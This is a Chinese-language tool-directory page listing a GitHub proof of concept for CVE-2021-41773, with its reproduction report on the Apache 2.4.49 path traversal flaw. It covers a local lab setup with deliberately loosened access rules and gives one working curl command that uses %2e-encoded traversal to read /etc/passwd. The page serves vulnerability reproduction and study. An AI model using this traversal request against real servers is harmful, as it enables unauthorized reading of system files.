Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/fxdyx-a/cve-2021-41773-poc
侦察漏洞分析漏洞利用Web安全渗透测试
GitHubfxdyx-a/cve-2021-41773-poc

CVE-2021-41773-POC

Apache HTTP Server 2.4.49 路径遍历漏洞复现

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773 漏洞复现报告

漏洞概述

  • CVE ID: CVE-2021-41773
  • 漏洞名称: Apache HTTP Server 路径遍历漏洞
  • 风险等级: 高危 (CVSS 7.5)
  • 影响版本: Apache HTTP Server 2.4.49
  • 漏洞描述: Apache HTTP Server 2.4.49 版本存在路径规范化函数 ap_normalize_path 的实现缺陷,攻击者可通过构造含有 %2e 编码的特殊请求绕过访问控制,读取 Web 服务器上的任意文件。

环境搭建

  • 操作系统: Ubuntu 20.04 (虚拟机)
  • Web服务器: Apache httpd 2.4.49 (手动编译安装)
  • 靶场环境: 独立运行,监听端口 8080
  • 关键配置:
    • 修改 <Directory /> 的 Require all denied 为 Require all granted
    • 添加 Alias /vuln 指向 /tmp/vuln_dir 并设置权限

漏洞复现

攻击命令

curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

攻击截图

读取 /etc/passwd 成功 读取 /etc/passwd 成功

下载工具